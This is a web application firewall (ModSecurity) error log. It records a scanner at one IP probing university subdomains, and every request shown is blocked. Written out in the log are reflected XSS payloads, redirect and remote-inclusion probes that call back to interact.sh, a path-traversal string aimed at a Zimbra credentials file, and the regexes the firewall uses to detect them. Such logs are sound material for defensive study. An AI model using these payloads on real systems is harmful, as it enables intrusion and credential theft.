[Tue Aug 29 11:52:21.143945 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hcCo-f0AAAoEZMwAAAAB"]
[Tue Aug 29 11:52:21.173350 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAnoOqsAAAAf"]
[Tue Aug 29 11:52:21.199738 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAoEZM4AAAAB"]
[Tue Aug 29 11:52:21.865128 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoMLZsAAAAH"]
[Tue Aug 29 11:52:21.924094 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEUAAAAG"]
[Tue Aug 29 11:52:21.943928 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEYAAAAG"]
[Tue Aug 29 11:52:22.116777 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoEZNkAAAAB"]
[Tue Aug 29 11:52:22.144304 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hsCo-f0AAAoEZNoAAAAB"]
[Tue Aug 29 11:52:22.223663 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoEZN0AAAAB"]
[Tue Aug 29 11:52:22.824053 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hsCo-f0AAAoPuS8AAAAM"]
[Tue Aug 29 11:52:22.825241 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hsCo-f0AAAoN9bcAAAAJ"]
[Tue Aug 29 11:52:23.544745 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAmNp60AAAAQ"]
[Tue Aug 29 11:52:23.588668 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoEZOEAAAAB"]
[Tue Aug 29 11:52:23.592779 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAmNp64AAAAQ"]
[Tue Aug 29 11:52:23.594296 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnd3GcAAAAI"]
[Tue Aug 29 11:52:23.617172 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15h8Co-f0AAAnkwisAAAAY"]
[Tue Aug 29 11:52:23.617240 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15h8Co-f0AAAoLfE8AAAAG"]
[Tue Aug 29 11:52:23.617537 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoEZOIAAAAB"]
[Tue Aug 29 11:52:23.630948 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoGFXcAAAAE"]
[Tue Aug 29 11:52:24.683810 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15iMCo-f0AAAoO5ycAAAAK"]
[Tue Aug 29 11:52:24.725459 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnjjN8AAAAX"]
[Tue Aug 29 11:52:24.790024 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAlIBmAAAAAn"]
[Tue Aug 29 11:52:24.795371 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoEZOMAAAAB"]
[Tue Aug 29 11:52:24.824860 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnjjOAAAAAX"]
[Tue Aug 29 11:52:24.833516 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAoN9b8AAAAJ"]
[Tue Aug 29 11:52:24.833695 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoLfFEAAAAG"]
[Tue Aug 29 11:52:24.841251 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15iMCo-f0AAAoO5ygAAAAK"]
[Tue Aug 29 11:52:24.842225 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnTlO8AAAAA"]
[Tue Aug 29 11:52:24.860237 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAnHQjkAAAAT"]
